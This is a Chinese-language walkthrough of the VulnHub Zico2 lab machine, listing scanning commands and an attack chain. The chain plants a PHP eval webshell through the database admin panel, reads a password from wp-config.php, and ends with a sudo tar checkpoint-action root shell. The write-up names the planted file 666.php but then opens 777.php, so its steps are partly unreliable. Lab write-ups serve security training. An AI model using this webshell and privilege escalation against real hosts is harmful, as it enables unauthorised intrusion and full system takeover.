下载地址
https://www.vulnhub.com/entry/zico2-1,210/
主机发现
arp-scan -l
端口扫描
nmap -sV -A -T4 192.168.229.154
目录扫描
python dirsearch.py -u http://192.168.229.155
二.内网渗透
打开网页
http://192.168.229.155
拼接上述路径访问,发现/dbadmin/
路径下有一个登录框
尝试弱口令登录发现admin
成功登录
发现info处有账户密码
进行解密
发现登录不上
创建数据库
创建数据库表
在表中写入一句话木马<?php phpinfo();@eval($_POST['cmd']); ?>
将其重命名为666.php,这样此处将不再使用绝对路径,而使用相对路径即会移动到当前管理页面的同级目录 /dbadmin/中
http://192.168.229.155/dbadmin/
访问777.php
http://192.168.229.155/dbadmin/777.php
蚁剑链接
寻找敏感信息,最后在/home/zico/wordpress/wp-config.php
路径下找到一个账号密码
密码就是
sWfCsfJSPV9H3AmQzw8
ssh连接
ssh zico@192.168.229.155
sudo -l
使用tar提权
https://gtfobins.github.io/#tar
输入,提权成功
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
whoami
id